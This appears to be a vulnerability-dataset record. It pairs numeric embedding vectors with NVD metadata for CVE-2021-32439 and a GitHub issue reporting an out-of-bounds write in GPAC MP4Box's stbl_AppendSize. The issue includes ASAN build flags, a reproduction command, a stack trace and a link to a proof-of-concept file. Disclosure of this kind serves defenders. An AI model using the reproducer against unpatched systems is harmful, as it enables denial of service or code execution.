-0.004593771416693926, 0.009784592315554619, 0.02150784060359001, 0.0004124472616240382, -0.021128538995981216, -0.01274876855313778, -0.005081947427242994, 0.003369819140061736, -0.015340667217969894, 0.00934909749776125, -0.004593771416693926, -0.0019527040421962738, -0.003512057475745678, 0.02756262756884098, 0.0033294304739683867, -0.006135564763098955, -0.015846403315663338, 0.01150550041347742, -0.015424956567585468, -0.01862795278429985, 0.02896745130419731, 0.010325449518859386, 0.023263869807124138, 0.018908917903900146, 0.0040564266964793205, 0.012608286924660206, 0.007189181633293629, -0.006585108116269112, 0.0027271127328276634, 0.020664947107434273, 0.01705455221235752, -0.006869584787636995, 0.0026533594354987144, -0.009672206826508045, -0.008274408057332039, 0.0006760710966773331, -0.008218214847147465, -0.000457445508800447, -0.008499179035425186, -0.00690119294449687, -0.01047295518219471, -0.00449894554913044, 0.0010228867176920176, 0.007055723574012518, -0.005826503504067659, -0.0028394984547048807, -0.013858579099178314, -0.007227814290672541, -0.015214233659207821, -0.00407749880105257, -0.012095525860786438, -0.002502341056242585, 0.006585108116269112, -0.02539920061826706, -0.006058299448341131, -0.0036560518201440573, 0.015214233659207821, 0.013612735085189342, -0.020622801035642624, -0.006806367542594671, -0.0038246307522058487, -0.01311402302235365, 0.018262699246406555, 0.012432684190571308, 0.010093653574585915, 0.0017173961969092488, 0.025947080925107002, -0.013640831224620342, 0.005988058168441057, 0.01121751219034195, 0.02004682458937168, 0.002790329745039344, -0.01193397119641304, 0.015200184658169746, 0.01192694716155529, -0.003901895834133029, 0.023530784994363785, 0.006121516227722168, -0.0023495664354413748, 0.009777568280696869, 0.001798173412680626, -0.014975413680076599, 0.017461949959397316, 0.006121516227722168, -0.02539920061826706, -0.013128071092069149, -0.0005276866722851992, -0.020721139386296272, 0.002038749400526285, 0.0019351437222212553, 0.006792319472879171, 0.001169515191577375, 0.03335049748420715, 0.02083352580666542, -0.019555136561393738, 0.01042378693819046, 0.011730272322893143, 0.006946849636733532, -0.004562162794172764, 0.009819712489843369, 0.009686254896223545, -0.01275579258799553, 0.001059763366356492, 0.0036384917329996824, -0.001671739388257265, -0.02399437688291073, 0.006075859535485506, 0.008885505609214306, -0.007227814290672541, 0.010170918889343739, -0.0020668457727879286, 0.023320062085986137, -0.004481385461986065, 0.004095058888196945, -0.0013231677003204823, 0.0028236943762749434, 0.032423313707113266, 0.008407865650951862, 0.0025725821033120155, 0.005496370140463114, 0.016998358070850372, 0.018866773694753647, 0.010683679021894932, 0.02919222228229046, -0.0005386618431657553, 0.0020984543953090906, 0.013999061658978462, -0.020355885848402977, -0.004000233486294746, -0.006978458259254694, -0.03056894801557064, -0.019625376909971237, 0.01788339763879776, 0.019246075302362442, 0.02978224866092205, -0.009693278931081295, 0.01194099523127079, -0.0020440174266695976, 0.01528447400778532, -0.004246077500283718, 0.010508076287806034, -0.010121749714016914, 0.004221493378281593, 0.0011264925124123693, 0.01712479256093502, 0.013647855259478092, -0.00710840430110693, 0.05060172453522682, -0.003292554058134556, -0.0019052912248298526, 0.003975649364292622, -0.005657924804836512, -0.013233432546257973, -0.010501052252948284, -0.004755326081067324, -0.011442283168435097, 0.02549753710627556, -0.025834694504737854, 0.014371339231729507, 0.021184731274843216, -0.021339261904358864, -0.011477404274046421, -0.014006085693836212, -0.006736126262694597, 0.009145397692918777, 0.006999530829489231, 0.012004212476313114, -0.00005248879824648611, -0.010479980148375034, 0.01039569079875946, -0.01852961629629135, 0.004347927402704954, 0.001065909513272345, 0.020763283595442772, -0.00852025207132101, 0.018262699246406555, -0.030007019639015198, 0.01861390471458435, -0.010578317567706108, 0.010318425484001637, -0.006163660902529955, 0.02459845133125782, -0.008653709664940834, -0.002570826094597578, 0.019119640812277794, 0.010767968371510506, -0.015326619148254395, -0.008211190812289715, 0.0013556542107835412, -0.005654412787407637, 0.010255208238959312, 0.002483024727553129, 0.001420627231709659, -0.014708496630191803, -0.007298055570572615, 0.005527978762984276, -0.00787403341382742, -0.008485130965709686, 0.014350267127156258, -0.00393701670691371, -0.006760710850358009, -0.010220087133347988, 0.00670100562274456, -0.018051976338028908, -0.0024443920701742172, 0.0013942868681624532, 0.0006238291971385479, -0.014891124330461025, -0.021114490926265717, -0.008864433504641056, 0.002003628760576248, -0.008407865650951862, -0.002119526732712984, 0.006314679514616728, 0.031720902770757675, 0.004007257521152496, 0.02007492072880268, 0.0007954810280352831, -0.01652071811258793, -0.029248414561152458, -0.0038773114793002605, -0.0032802617643028498, 0.006785294972360134, 0.02025754749774933, 0.0055982195772230625, 0.00204226141795516, 0.010985716246068478, 0.012769841589033604, -0.001468918053433299, 0.010114725679159164, -0.005324279423803091, -0.010199015028774738, 0.007234838325530291, -0.012418635189533234, -0.0007467512623406947, -0.0028201821260154247, 0.015143992379307747, -0.008084756322205067, -0.002365370746701956, -0.006957386154681444, -0.01040973886847496, -0.008253335021436214, 0.014301097951829433, 0.006974946241825819, 0.015115895308554173, 0.01374619361013174, 0.02678997442126274, -0.009433386847376823, 0.015087799169123173, -0.01999063231050968, -0.01081713754683733, 0.004361975472420454, 0.009552796371281147, -0.02022945135831833, -0.03509248048067093, -0.00047017671749927104, -0.018290795385837555, 0.008801216259598732, 0.01940060593187809, -0.008513227105140686, 0.015986885875463486, -0.00816202163696289, -0.005837039556354284, -0.02166237123310566, 0.007796767633408308, 0.012397563084959984, 0.007684382144361734, 0.004105595406144857, -0.008000466972589493, -0.0030467098113149405, -0.0005632462562061846, 0.020426126196980476, -0.017771011218428612, 0.021816901862621307, 0.03261999040842056, -0.0028465227223932743, 0.009805664420127869, -0.00688012083992362, -0.006307655479758978, -0.003968624863773584, 0.011308825574815273, -0.01378131378442049, 0.021802853792905807, -0.0021792317274957895, 0.0024496600963175297, -0.0015874500386416912, 0.009264808148145676, 0.010107701644301414, 0.03149613365530968, -0.02166237123310566, 0.016043078154325485, -0.036946844309568405, -0.0014136031968519092, -0.014680400490760803, -0.009721375070512295, -0.010487004183232784, -0.018908917903900146, 0.013844531029462814, -0.009110277518630028, 0.01785530149936676, -0.00762116489931941, 0.0026990161277353764, 0.001478576217778027, -0.010311400517821312, 0.021479744464159012, 0.009011940099298954, -0.009763520210981369, 0.029360800981521606, 0.005317254923284054, 0.006096932105720043, 0.018824627622961998, 0.007062747608870268, 0.01151252444833517, 0.0057492381893098354, 0.00895574688911438, 0.007937249727547169, -0.010227111168205738, -0.009257784113287926, -0.009967219084501266, -0.022954808548092842, -0.021184731274843216, 0.005117068067193031, 0.015298523008823395, -0.0026199950370937586, 0.0130929509177804, -0.006402480881661177, 0.003582298755645752, 0.021887142211198807, 0.018908917903900146, -0.03978458791971207, 0.006209317594766617, 0.0037473654374480247, 0.01649262197315693, -0.016253802925348282, -0.003359283087775111, 0.0006159270997159183, 0.011702176183462143, -0.006384920794516802, -0.007557947654277086, 0.022898614406585693, -0.002226644428446889, -0.028068363666534424, -0.002621751045808196, 0.01189885102212429, -0.008702878840267658, 0.02546944096684456, -0.03261999040842056, 0.00005805870023323223, -0.01944275014102459, -0.013999061658978462, 0.017518142238259315 ]
3,144
CVE-2021-32439
2021-08-11T20:15:09.013000
Buffer overflow in the stbl_AppendSize function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/77ed81c069e10b3861d88f72e1c6be1277ee7eae" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1774" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1774
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
A OOB Write issue was found in MP4Box, to reproduce, compile gpac as follows: ``` CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-debug ``` run poc file : ``` ./bin/gcc/MP4Box -hint poc -out /dev/null ``` Detailed ASAN result is as below: ``` 15305==ERROR: AddressSanitizer: SEGV on unknown address 0x616000010000 (pc 0x7ff3a3276461 bp 0x7ffc231be4c0 sp 0x7ffc231be490 T0) ==15305==The signal is caused by a WRITE memory access. #0 0x7ff3a3276460 in stbl_AppendSize isomedia/stbl_write.c:1650 #1 0x7ff3a3279df4 in MergeTrack isomedia/track.c:703 #2 0x7ff3a3225f85 in MergeFragment isomedia/isom_intern.c:90 #3 0x7ff3a3227ec2 in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:649 #4 0x7ff3a3228488 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:777 #5 0x7ff3a322881b in gf_isom_open_file isomedia/isom_intern.c:897 #6 0x7ff3a322b7f7 in gf_isom_open isomedia/isom_read.c:520 #7 0x558e07ad4e7e in mp4boxMain /home/src/gpac/applications/mp4box/main.c:5722 #8 0x558e07ad7653 in main /home/src/gpac/applications/mp4box/main.c:6335 #9 0x7ff3a2da60b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x558e07ac32ad in _start (/home/src/gpac/bin/gcc/MP4Box+0x182ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/stbl_write.c:1650 in stbl_AppendSize ==15305==ABORTING ``` Credit : ADLab of Venustech [oob_write_stbl_write_c_1650.zip](https://github.com/gpac/gpac/files/6404010/oob_write_stbl_write_c_1650.zip)
Out of bounds Write in stbl_write.c:1650
https://api.github.com/repos/gpac/gpac/issues/1774/comments
1
2021-04-30T08:40:50
2021-08-11T02:30:18Z
https://github.com/gpac/gpac/issues/1774
872,168,928
1,774
true
This is a GitHub Issue repo:gpac owner:gpac Title : Out of bounds Write in stbl_write.c:1650 Issue date: --- start body --- A OOB Write issue was found in MP4Box, to reproduce, compile gpac as follows: ``` CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --enable-debug ``` run poc file : ``` ./bin/gcc/MP4Box -hint poc -out /dev/null ``` Detailed ASAN result is as below: ``` 15305==ERROR: AddressSanitizer: SEGV on unknown address 0x616000010000 (pc 0x7ff3a3276461 bp 0x7ffc231be4c0 sp 0x7ffc231be490 T0) ==15305==The signal is caused by a WRITE memory access. #0 0x7ff3a3276460 in stbl_AppendSize isomedia/stbl_write.c:1650 #1 0x7ff3a3279df4 in MergeTrack isomedia/track.c:703 #2 0x7ff3a3225f85 in MergeFragment isomedia/isom_intern.c:90 #3 0x7ff3a3227ec2 in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:649 #4 0x7ff3a3228488 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:777 #5 0x7ff3a322881b in gf_isom_open_file isomedia/isom_intern.c:897 #6 0x7ff3a322b7f7 in gf_isom_open isomedia/isom_read.c:520 #7 0x558e07ad4e7e in mp4boxMain /home/src/gpac/applications/mp4box/main.c:5722 #8 0x558e07ad7653 in main /home/src/gpac/applications/mp4box/main.c:6335 #9 0x7ff3a2da60b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x558e07ac32ad in _start (/home/src/gpac/bin/gcc/MP4Box+0x182ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/stbl_write.c:1650 in stbl_AppendSize ==15305==ABORTING ``` Credit : ADLab of Venustech [oob_write_stbl_write_c_1650.zip](https://github.com/gpac/gpac/files/6404010/oob_write_stbl_write_c_1650.zip) --- end body ---
1,772
[ -0.026588214561343193, 0.01877429150044918, -0.009722666814923286, 0.00592009024694562, 0.02870572730898857, 0.00940951332449913, -0.03116621822118759, 0.050372958183288574, -0.02421719580888748, 0.017954127863049507, -0.005058918613940477, 0.020295321941375732, 0.033074963837862015, 0.003228462301194668, 0.006371180061250925, -0.002337466459721327, -0.009789771400392056, 0.01449452806264162, -0.0016011830884963274, -0.0053310636430978775, 0.03280654549598694, -0.03432757407426834, -0.023471591994166374, 0.04542215168476105, -0.008052515797317028, 0.02378474548459053, -0.006121403072029352, 0.006397276185452938, 0.021428639069199562, 0.029570626094937325, -0.012026580981910229, 0.0189532358199358, -0.007940675131976604, 0.012071317061781883, 0.039129260927438736, 0.0003180463972967118, 0.039039790630340576, 0.08696717023849487, -0.0030923897866159678, 0.018312016502022743, -0.0035061994567513466, -0.07086213678121567, -0.017834831029176712, 0.019490070641040802, 0.007664802018553019, 0.03379074111580849, 0.011459922417998314, -0.010289325378835201, -0.03379074111580849, -0.0022163058165460825, 0.010736687108874321, -0.009767402894794941, 0.005140934605151415, -0.0651359036564827, -0.005263959523290396, -0.042767804116010666, 0.01193710882216692, 0.018282193690538406, 0.0007712334045208991, 0.014166462235152721, -0.0322398878633976, 0.015926087275147438, 0.008954695425927639, 0.02230845019221306, -0.010334061458706856, -0.0028034683782607317, 0.018804114311933517, 0.024649644270539284, -0.031881995499134064, 0.03304513916373253, -0.0062220594845712185, -0.029630275443196297, 0.012160790152847767, 0.03471529111266136, -0.009491530247032642, -0.0111616812646389, 0.02227862738072872, 0.03049517422914505, -0.026111027225852013, 0.02221897803246975, -0.050850145518779755, 0.026081202551722527, -0.029824132099747658, 0.03068903088569641, -0.009581002406775951, 0.0035807597450912, -0.02193564921617508, -0.07306912541389465, -0.021339166909456253, -0.04127660021185875, 0.020504090934991837, 0.038562603294849396, 0.01113931369036436, 0.005312423687428236, 0.03068903088569641, 0.03450652211904526, -0.00407845014706254, -0.008127075619995594, -0.043185342103242874, -0.00622951565310359, -0.0331047847867012, -0.030987273901700974, -0.005953642539680004, 0.009894155897200108, 0.02008655294775963, -0.0026729877572506666, 0.01768570952117443, -0.01447216048836708, 0.02968992292881012, 0.13385070860385895, 0.010885808616876602, 0.014688384719192982, -0.012697624042630196, 0.021905824542045593, 0.01787956804037094, 0.014882242307066917, -0.006378636229783297, -0.025991730391979218, -0.04264850914478302, -0.030107460916042328, -0.02742328867316246, -0.011765619739890099, -0.025514544919133186, -0.0038510409649461508, -0.0007647093734703958, 0.038980141282081604, -0.01744711771607399, 0.005670313257724047, -0.022576868534088135, 0.005267687141895294, -0.038502953946590424, -0.05123785883188248, 0.010587566532194614, -0.023799657821655273, -0.004421427380293608, 0.028064507991075516, -0.03632579371333122, 0.02657330222427845, 0.021219870075583458, 0.052878186106681824, -0.06081140413880348, -0.032359182834625244, 0.02561892941594124, 0.01078142412006855, -0.013756380416452885, 0.007694626227021217, 0.015911174938082695, 0.0022927301470190287, -0.0352819487452507, 0.01158667542040348, -0.011862548068165779, -0.03456616774201393, 0.024664556607604027, 0.042141497135162354, 0.06907268613576889, -0.004667476750910282, 0.021458463743329048, 0.03116621822118759, 0.011541939340531826, -0.01725326105952263, -0.027497850358486176, -0.03495388105511665, -0.0015676309121772647, -0.014986625872552395, -0.01787956804037094, -0.017178699374198914, 0.03722051531076431, 0.030390789732336998, -0.022755812853574753, 0.019683927297592163, 0.009782315231859684, -0.014889697544276714, -0.002758732298389077, 0.01184018049389124, -0.05935002118349075, -0.021070748567581177, 0.019370773807168007, 0.051178209483623505, -0.018878675997257233, -0.008857767097651958, -0.0019572086166590452, -0.004917253740131855, 0.018147984519600868, -0.0013150578597560525, 0.01468092855066061, -0.023441767320036888, 0.023814570158720016, -0.034208279103040695, 0.03471529111266136, -0.012936217710375786, -0.0003327254671603441, -0.021309342235326767, -0.01447216048836708, -0.00477558933198452, 0.049448411911726, 0.010430989786982536, -0.05442903935909271, -0.032180238515138626, 0.003217278281226754, 0.008186724036931992, 0.0029153088107705116, -0.02482859045267105, -0.008895047008991241, 0.007977955043315887, -0.025738226249814034, 0.012936217710375786, -0.023620711639523506, 0.031136393547058105, -0.005301239434629679, -0.011109489016234875, -0.03754858300089836, -0.018416400998830795, 0.015463812276721, -0.00645319651812315, -0.03596790134906769, 0.0033142066095024347, -0.023561064153909683, 0.0018845123704522848, -0.001247953507117927, -0.0229794941842556, 0.04548180103302002, -0.005562200676649809, 0.006374908145517111, -0.008842854760587215, -0.02936185710132122, -0.008887591771781445, -0.005193126853555441, 0.011683603748679161, -0.016477832570672035, 0.009841963648796082, 0.02278563752770424, -0.007500769104808569, -0.011109489016234875, 0.00724726403132081, 0.012727448716759682, 0.0016160951927304268, -0.021070748567581177, 0.021547935903072357, 0.000584832567255944, 0.006807358004152775, -0.032120589166879654, 0.031941644847393036, -0.013935325667262077, -0.00346891931258142, 0.008261284790933132, 0.061258766800165176, -0.04193272814154625, -0.013018233701586723, -0.009782315231859684, 0.014800225384533405, -0.00530869560316205, -0.002070913091301918, 0.003985249437391758, 0.002098873257637024, -0.0019907609093934298, -0.008037603460252285, 0.017268171533942223, 0.0058790817856788635, -0.016000647097826004, -0.021219870075583458, 0.020205849781632423, -0.006702973507344723, -0.05150627717375755, -0.0027866922318935394, -0.002926493063569069, -0.026170676574110985, 0.01210114173591137, 0.0009189560660161078, -0.020011993125081062, -0.0013336979318410158, 0.014241022989153862, -0.03191182017326355, -0.02226371504366398, -0.03134516254067421, 0.005137206520885229, 0.006333900149911642, -0.0007623793790116906, 0.008753382600843906, 0.0001554116897750646, 0.0034801033325493336, -0.014203743077814579, -0.004488531965762377, 0.0034316391684114933, 0.030346054583787918, 0.009767402894794941, -0.02411281131207943, 0.011802900582551956, -0.0012227894039824605, 0.005976010579615831, 0.013077882118523121, 0.030107460916042328, 0.022487396374344826, -0.05064137652516365, 0.020116377621889114, 0.003910689149051905, 0.006915470585227013, -0.006900558713823557, -0.003362670773640275, 0.004995542112737894, -0.02065321058034897, -0.009424425661563873, 0.017148876562714577, -0.009677930735051632, -0.03620649501681328, -0.0275574978441, 0.004510900005698204, -0.04235026612877846, -0.005200583022087812, -0.02278563752770424, -0.003459599334746599, 0.01764097437262535, -0.07503751665353775, -0.02964518778026104, -0.02888467162847519, -0.011348082683980465, -0.02652856521308422, -0.006251883693039417, -0.005345975514501333, -0.019281301647424698, 0.003735472448170185, -0.03892049193382263, 0.028109245002269745, -0.03361179679632187, 0.012048949487507343, 0.033403027802705765, -0.010587566532194614, -0.006889374461025, 0.02916800044476986, -0.07664801925420761, 0.017506765201687813, -0.008686278015375137, -0.011400274001061916, -0.018282193690538406, -0.05589042231440544, 0.00649047689512372, -0.04258885979652405, -0.026230324059724808, 0.015344515442848206, 0.03999416157603264, -0.007019855082035065, -0.0004180038522463292, 0.008827943354845047, 0.021920736879110336, -0.0016393952537328005, -0.03820471465587616, -0.005424263887107372, 0.01468092855066061, -0.004220114555209875, 0.006497932597994804, 0.0027289080899208784, 0.0008770158747211099, 0.039934512227773666, 0.02108566090464592, 0.039934512227773666, 0.03608720004558563, -0.0014371504075825214, -0.0066284132190048695, -0.010289325378835201, -0.00640473235398531, 0.014285759069025517, 0.024142634123563766, -0.043244991451501846, -0.013301562517881393, -0.007746818475425243, 0.016462920233607292, 0.0054466319270431995, 0.035580188035964966, 0.016373448073863983, 0.022919844835996628, -0.022442659363150597, -0.03886084258556366, 0.027527673169970512, -0.02770661935210228, 0.03346267715096474, 0.0023449223954230547, -0.008917415514588356, 0.019982168450951576, 0.025589104741811752, -0.014002430252730846, 0.017462030053138733, -0.03435739874839783, 0.030957449227571487, 0.042380090802907944, -0.04861333593726158, 0.01070686336606741, 0.02892940863966942, -0.029570626094937325, 0.05574130266904831, -0.03602755069732666, -0.018147984519600868, -0.03975556790828705, 0.041962552815675735, -0.04554145038127899, -0.07265158742666245, -0.007239807862788439, 0.0045556360855698586, -0.01853569783270359, -0.027005750685930252, -0.0026152036152780056, -0.05442903935909271, 0.036385439336299896, -0.01957954280078411, 0.008775751106441021, 0.00274754804559052, 0.017790094017982483, 0.03635561838746071, 0.0034446872305125, -0.005722505506128073, 0.040918707847595215, -0.014203743077814579, 0.012421751394867897, -0.013793661259114742, 0.005606936756521463, 0.014934434555470943, 0.04613793268799782, 0.005651672836393118, -0.0044661639258265495, -0.000522854330483824, -0.05156592279672623, 0.052788712084293365, -0.020727772265672684, -0.020310234278440475, -0.020817244425415993, 0.006874462589621544, -0.000853249803185463, 0.023486504331231117, -0.013734012842178345, 0.016433097422122955, -0.005729961208999157, -0.027930298820137978, -0.006691789720207453, -0.01668660156428814, -0.007027311250567436, -0.0036907363682985306, 0.010759055614471436, -0.03128551319241524, -0.03408898413181305, -0.05517464503645897, 0.006072938907891512, -0.008261284790933132, -0.018401488661766052, 0.019162004813551903, -0.0018714643083512783, -0.014621281065046787, 0.04056081920862198, -0.03438722342252731, -0.02912326529622078, -0.025708401575684547, 0.025693489238619804, -0.024097898975014687, -0.02618558704853058, 0.013830941170454025, 0.009633194655179977, -0.001960936700925231, -0.01125115342438221, -0.012242806144058704, -0.008328388445079327, -0.006285435985773802, 0.03710122033953667, 0.013398490846157074, -0.01971375197172165, 0.004928437992930412, 0.00031897841836325824, -0.021443551406264305, 0.028243452310562134, 0.015493636950850487, -0.027303993701934814, -0.009170920588076115, 0.005051462445408106, -0.016626954078674316, -0.010602478869259357, 0.01465856097638607, -0.008544613607227802, 0.004003889858722687, -0.008358213119208813, 0.02892940863966942, -0.002070913091301918, -0.0066284132190048695, -0.0053310636430978775, -0.04169413819909096, -0.006397276185452938, -0.028392573818564415, -0.02557419240474701, 0.011213873513042927, -0.0021547935903072357, -0.0002889212919399142, -0.041157301515340805, -0.02132425457239151, 0.0017521677073091269, -0.006125131156295538, 0.01564275659620762, 0.02062338776886463, -0.002385930623859167, -0.03814506530761719, -0.005979738663882017, 0.009804683737456799, -0.010609935037791729, 0.02051900327205658, 0.03495388105511665, 0.015970822423696518, 0.014106814749538898, -0.023725096136331558, 0.0014846825506538153, 0.024619821459054947, 0.02685663104057312, -0.03110656887292862, -0.021264605224132538, 0.0350731797516346, 0.0009385281591676176, -0.009707755409181118, -0.02898905612528324, -0.02345667965710163, 0.004208930768072605, -0.04739054664969444, -0.02042953111231327, -0.020116377621889114, 0.03385039046406746, -0.009677930735051632, 0.027527673169970512, 0.002070913091301918, -0.011005104519426823, 0.0008266876684501767, -0.024888237938284874, 0.006367451976984739, 0.02254704385995865, 0.0125783272087574, 0.02870572730898857, -0.013838397338986397, 0.024291755631566048, -0.002464218996465206, -0.021070748567581177, -0.0006384228472597897, -0.009536266326904297, 0.024082986637949944, -0.02274090051651001, 0.006960206665098667, -0.0010168164735659957, 0.029018880799412727, -0.018043600022792816, -0.02047426626086235, -0.017223436385393143, 0.05120803415775299, -0.015687493607401848, 0.026409268379211426, -0.005782153457403183, 0.035490717738866806, -0.009946348145604134, 0.017432205379009247, -0.02060847543179989, -0.01167614758014679, 0.003733608638867736, 0.006960206665098667, 0.016015559434890747, 0.025932082906365395, 0.02496279776096344, 0.0005219223094172776, -0.019564630463719368, 0.014084446243941784, 0.025991730391979218, 0.032031118869781494, 0.006371180061250925, 0.011303345672786236, 0.0031296699307858944, -0.024321580305695534, 0.006408460438251495, -0.026603125035762787, -0.002391522517427802, 0.03733981400728226, -0.033760916441679, -0.007001215126365423, 0.009707755409181118, 0.0006561308982782066, 0.03835383430123329, -0.02008655294775963, -0.008917415514588356, -0.010684494860470295, 0.0017288676463067532, 0.0036105839535593987, -0.015627844259142876, -0.023337382823228836, -0.002335602417588234, -0.027438201010227203, -0.00027167919324710965, 0.003411135170608759, 0.015038818120956421, -0.014352863654494286, -0.00983450748026371, 0.013681820593774319, -0.008634085766971111, -0.012705080211162567, -0.0021827537566423416, 0.010408622212707996, -0.006162411067634821, -0.03471529111266136, -0.005241591017693281, -0.02973465994000435, 0.002419482683762908, -0.011877460405230522, 0.0018845123704522848, 0.005562200676649809, -0.012451575137674809, 0.05427991971373558, -0.002333738375455141, -0.027259256690740585, -0.013271738775074482, -0.007985411211848259, 0.013801117427647114, 0.0024493068922311068, -0.03164340555667877, 0.05082032084465027, -0.007131695747375488, 0.012637975625693798, 0.05341501906514168, -0.023799657821655273, 0.013443227857351303, -0.01395023800432682, 0.03256795182824135, 0.008462597616016865, -0.013040601275861263, 0.018893588334321976, 0.02851187065243721, -0.047062478959560394, 0.012794552370905876, -0.032836370170116425, 0.021443551406264305, 0.032836370170116425, -0.01971375197172165, -0.026319796219468117, -0.004674932919442654, -0.016895370557904243, -0.02108566090464592, 0.027020663022994995, 0.018073424696922302, -0.03200129419565201, -0.03304513916373253, 0.008328388445079327, 0.030316229909658432, 0.002337466459721327, -0.03197146952152252, -0.004328227136284113, 0.0013113297754898667, 0.012898936867713928, -0.02241283468902111, 0.01644800789654255, -0.025499632582068443, -0.004876245744526386, 0.024932974949479103, -0.018416400998830795, 0.019639190286397934, 0.0344170480966568, -0.011191505938768387, -0.011601587757468224, 0.002579787513241172, 0.017655886709690094, 0.009073992259800434, -0.0034577352926135063, 0.06471836566925049, 0.0738445520401001, -0.014412512071430683, -0.032180238515138626, -0.012779640965163708, -0.03584860637784004, -0.019892696291208267, -0.00782137829810381, 0.0053944396786391735, -0.007209984119981527, -0.025275951251387596, 0.004313315264880657, -0.000552678422536701, -0.006401004269719124, -0.0016207551816478372, -0.001532214810140431, 0.020876891911029816, -0.006069210823625326, -0.0005456884391605854, -0.017133964225649834, -0.009364777244627476, -0.0019572086166590452, -0.025305775925517082, 0.00948407407850027, 0.01283928845077753, -0.008924871683120728, 0.012212982401251793, 0.015970822423696518, -0.021398814395070076, 0.014419968239963055, -0.006415916606783867, -0.023337382823228836, -0.021145310252904892, -0.025708401575684547, 0.026349620893597603, -0.002743820194154978, 0.022949669510126114, 0.052639592438936234, 0.01025950163602829, -0.03540124371647835, 0.015023906715214252, -0.011556850746273994, -0.0006151227280497551, 0.0012908256612718105, -0.0233075600117445, 0.011541939340531826, 0.007679713889956474, -0.011191505938768387, 0.016492744907736778, 0.033760916441679, -0.012205526232719421, 0.0012665935792028904, 0.008425317704677582, 0.0021902096923440695, -0.0011780532076954842, 0.02435140311717987, -0.026990840211510658, 0.008380580693483353, 0.00012290803715586662, -0.028332924470305443, 0.001850960194133222, -0.010773967951536179, -0.006483020726591349, 0.016179591417312622, -0.02202512137591839, -0.03781699761748314, -0.011340626515448093, -0.015359427779912949, -0.0071540637873113155, -0.007463489193469286, -0.01796904020011425, 0.013912957161664963, 0.008991975337266922, 0.008119620382785797, -0.020399706438183784, -0.04539233073592186, -0.013898045755922794, 0.008611718192696571, 0.004790501203387976, -0.004354323260486126, 0.00009296741336584091, -0.007195071782916784, -0.015128291212022305, 0.013249370269477367, 0.009938891977071762, -0.002734500216320157, 0.017998863011598587, -0.028869759291410446, 0.004947077948600054, -0.011288434267044067, 0.02681189402937889, -0.008231460116803646, -0.03405915945768356, 0.037518758326768875, 0.009916523471474648, 0.024604909121990204, -0.002065321197733283, -0.030897799879312515, -0.012414295226335526, -0.029376769438385963, 0.022472484037280083, 0.018356753513216972, 0.007843746803700924, -0.029675010591745377, 0.015657668933272362, 0.010848527774214745, 0.030152197927236557, 0.005062646232545376, -0.03012237325310707, -0.01588135026395321, 0.0009991084225475788, -0.020161112770438194, 0.02624523639678955, -0.021204957738518715, 0.010229676961898804, -0.003006645245477557, -0.014315583743155003, 0.008745926432311535, 0.020578650757670403, -0.028258364647626877, 0.000638888799585402, 0.03611702471971512, 0.00407845014706254, -0.006020746659487486, -0.0189532358199358, 0.016805898398160934, -0.055771127343177795, 0.02038479410111904, 0.015687493607401848, -0.006471836473792791, 0.008887591771781445, -0.014017341658473015, -0.006908014416694641, 0.012347190640866756, 0.003575167851522565, -0.012682711705565453, 0.037041570991277695, -0.015143202617764473, 0.0023542423732578754, -0.020906716585159302, 0.0014334223233163357, 0.008820487186312675, -0.00929021742194891, -0.013845853507518768, 0.009141096845269203, -0.010609935037791729, -0.021667232736945152, -0.03025658242404461, -0.016567304730415344, -0.04840456694364548, -0.039218734949827194, 0.012324822135269642, -0.011698516085743904, 0.007429936900734901, -0.009036712348461151, 0.0026990838814526796, 0.006233243737369776, -0.0129063930362463, -0.003278790507465601, -0.018476050347089767, 0.0028873488772660494, -0.01465856097638607, 0.012734903953969479, 0.025022447109222412, -0.012541047297418118, 0.017805006355047226, 0.01316735427826643, -0.056755322962999344, -0.00035858858609572053, -0.01423356682062149, 0.0049508060328662395, 0.015299779362976551, 0.03167322650551796, -0.0017959719989448786, -0.02198038436472416, 0.0037280165124684572, 